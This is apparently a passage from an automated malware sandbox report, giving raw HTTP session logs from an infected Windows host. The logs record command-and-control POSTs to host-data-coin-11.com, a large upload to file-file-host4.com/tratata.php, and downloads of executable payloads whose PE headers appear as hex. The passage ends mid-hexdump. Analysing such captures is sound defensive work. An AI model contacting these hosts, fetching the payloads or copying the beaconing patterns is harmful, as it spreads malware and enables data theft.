                                                                                                                                                                                                          Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          39192.168.2.34980331.28.27.13080C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:23:02.405131102 CET4271OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Referer: http://dantqwhs.net/
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Content-Length: 222
                                                                                                                                                                                                          Host: host-data-coin-11.com
                                                                                                                                                                                                          Dec 31, 2021 19:23:02.483506918 CET4272INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:23:02 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          4192.168.2.349835104.21.41.11443C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          40192.168.2.34980431.28.27.13080C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:23:02.569236040 CET4273OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Referer: http://meiprwiro.net/
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Content-Length: 262
                                                                                                                                                                                                          Host: host-data-coin-11.com
                                                                                                                                                                                                          Dec 31, 2021 19:23:02.645081043 CET4274INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:23:02 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Data Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 1e 49 3a 44 a6 e8 de ea e4 40 fd 45 91 6e b8 57 5b 91 17 bf ec 31 e5 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 2cI:82OI:D@EnW[10


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          41192.168.2.34980631.28.27.13080C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:23:07.351236105 CET4275OUTPOST /tratata.php HTTP/1.1
                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----DJMYU3ECBA1NYUA1
                                                                                                                                                                                                          Host: file-file-host4.com
                                                                                                                                                                                                          Content-Length: 104940
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                          Cookie: PHPSESSID=rd3dm5mqbrt7b88g82ka584gmv
                                                                                                                                                                                                          Dec 31, 2021 19:23:08.237663984 CET4379INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx/1.20.2
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:23:08 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                          Pragma: no-cache


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          42192.168.2.34981631.28.27.13080C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:23:23.945812941 CET13069OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Referer: http://ljbhnxlymc.org/
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Content-Length: 303
                                                                                                                                                                                                          Host: host-data-coin-11.com
                                                                                                                                                                                                          Dec 31, 2021 19:23:24.020386934 CET13069INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:23:23 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 48 e5 ae 8a 70 bc 57 dd 42 df f9 23 8d 21 ef c3 96 52 29 e0 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 46I:82OR&:UPJ%9HpWB#!R)c0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          43192.168.2.34981731.28.27.13080C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:23:24.163862944 CET13070OUTGET /files/6976_1640974830_4226.exe HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Host: data-host-coin-8.com
                                                                                                                                                                                                          Dec 31, 2021 19:23:24.221769094 CET13072INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:23:24 GMT
                                                                                                                                                                                                          Content-Type: application/x-msdos-program
                                                                                                                                                                                                          Content-Length: 756224
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Last-Modified: Fri, 31 Dec 2021 18:20:30 GMT
                                                                                                                                                                                                          ETag: "b8a00-5d47539dc6f38"
                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 df 23 4f a3 9b 42 21 f0 9b 42 21 f0 9b 42 21 f0 08 0c b9 f0 9a 42 21 f0 f4 34 bf f0 8a 42 21 f0 f4 34 8b f0 f4 42 21 f0 92 3a b2 f0 98 42 21 f0 9b 42 20 f0 29 42 21 f0 f4 34 8a f0 ac 42 21 f0 f4 34 bb f0 9a 42 21 f0 f4 34 bc f0 9a 42 21 f0 52 69 63 68 9b 42 21 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 89 dd a4 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 4c 0a 00 00 da 33 00 00 00 00 00 b0 82 08 00 00 10 00 00 00 60 0a 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 50 48 00 00 04 00 00 fb 78 0c 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 4a 0a 00 28 00 00 00 00 a0 3d 00 90 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 47 00 48 22 00 00 40 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 a5 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 b4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac 4a 0a 00 00 10 00 00 00 4c 0a 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 0c 2a 33 00 00 60 0a 00 00 8c 00 00 00 50 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 61 6a 75 74 00 00 05 00 00 00 00 90 3d 00 00 02 00 00 00 dc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 90 4e 0a 00 00 a0 3d 00 00 50 00 00 00 de 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ba 5a 00 00 00 f0 47 00 00 5c 00 00 00 2e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 4d 0a 00 52 4d 0a 00 66 4d 0a 00 7c 4d 0a 00 8c 4d 0a 00 a2 4d 0a 00 b2 4d 0a 00 ce 4d 0a 00 e2 4d 0a 00 f8 4d 0a 00 12 4e 0a 00 2c 4e 0a 00 44 4e 0a 00 58
                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$#OB!B!B!B!4B!4B!:B!B )B!4B!4B!4B!RichB!PEL_L3`@PHxdJ(=NGH"@@.textJL `.data*3`P@.bajut=@.rsrcN=P@@.relocZG\.@B@MRMfM|MMMMMMMN,NDNX


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          44192.168.2.34981831.28.27.13080C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:23:25.884939909 CET13856OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Referer: http://uwwpu.com/
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Content-Length: 302
                                                                                                                                                                                                          Host: host-data-coin-11.com
                                                                                                                                                                                                          Dec 31, 2021 19:23:25.958846092 CET13857INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:23:25 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          45192.168.2.34981931.28.27.13080C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:23:26.046370029 CET13858OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Referer: http://sbnixcsxgc.org/
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Content-Length: 365
                                                                                                                                                                                                          Host: host-data-coin-11.com
                                                                                                                                                                                                          Dec 31, 2021 19:23:26.122936010 CET13859INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:23:26 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          46192.168.2.34982031.28.27.13080C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:23:26.200181007 CET13860OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Referer: http://jejnywv.net/
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Content-Length: 123
                                                                                                                                                                                                          Host: host-data-coin-11.com
                                                                                                                                                                                                          Dec 31, 2021 19:23:26.278103113 CET13860INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:23:26 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          47192.168.2.34982131.28.27.13080C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:23:26.356214046 CET13861OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Referer: http://wumddtukdf.org/
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Content-Length: 366
                                                                                                                                                                                                          Host: host-data-coin-11.com
                                                                                                                                                                                                          Dec 31, 2021 19:23:26.437910080 CET13862INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:23:26 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          48192.168.2.34982231.28.27.13080C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:23:26.522402048 CET13863OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Referer: http://dxloujq.org/
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Content-Length: 192
                                                                                                                                                                                                          Host: host-data-coin-11.com
                                                                                                                                                                                                          Dec 31, 2021 19:23:26.600037098 CET13863INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:23:26 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          49192.168.2.34982331.28.27.13080C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:23:26.677365065 CET13864OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Referer: http://dfxeayag.net/
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Content-Length: 276
                                                                                                                                                                                                          Host: host-data-coin-11.com
                                                                                                                                                                                                          Dec 31, 2021 19:23:26.754025936 CET13865INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:23:26 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Data Raw: 32 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 98 d6 08 55 3f 41 be f2 d8 fc fb 43 fc 53 cd 76 bb 44 10 99 04 e1 fa 67 e5 32 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 2eI:82OU?ACSvDg2P0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          5192.168.2.349836164.132.207.80443C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          50192.168.2.34982491.243.44.12880C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:23:26.827646017 CET13865OUTGET /stlr/maps.exe HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Host: 91.243.44.128
                                                                                                                                                                                                          Dec 31, 2021 19:23:26.891132116 CET13867INHTTP/1.1 200 OK
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:23:26 GMT
                                                                                                                                                                                                          Server: Apache/2.4.18 (Ubuntu)
                                                                                                                                                                                                          Last-Modified: Fri, 31 Dec 2021 09:21:26 GMT
                                                                                                                                                                                                          ETag: "181490-5d46db1fb73a3"
                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                          Content-Length: 1578128
                                                                                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: application/x-msdos-program
                                                                                                                                                                                                          Data Raw: 4d 5a e2 15 17 e8 ec 6f ac 01 a3 67 88 27 b0 3a 07 28 33 98 08 dd 33 32 a2 e3 d0 db df 66 f6 e9 c8 9b f0 ce 43 27 42 7b 62 19 d6 e4 19 09 05 f6 16 cd 2b 9a c3 52 c6 c7 98 88 64 3a 00 01 00 00 0b 51 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 13 aa cc 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 2e 01 00 00 82 03 00 00 00 00 00 00 50 3f 00 00 10 00 00 00 40 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 40 00 00 04 00 00 63 e0 18 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 40 3d 00 58 01 00 00 00 50 3d 00 1c f6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 61 64 61 74 61 00 00 00 30 3d 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 2e 61 64 61 74 61 00 00 00 10 00 00 00 40 3d 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 1c f6 01 00 00 50 3d 00 1c f6 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 65 78 74 00 00 00 00 80 01 00 00 50 3f 00 51 7d 01 00 00 fe 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 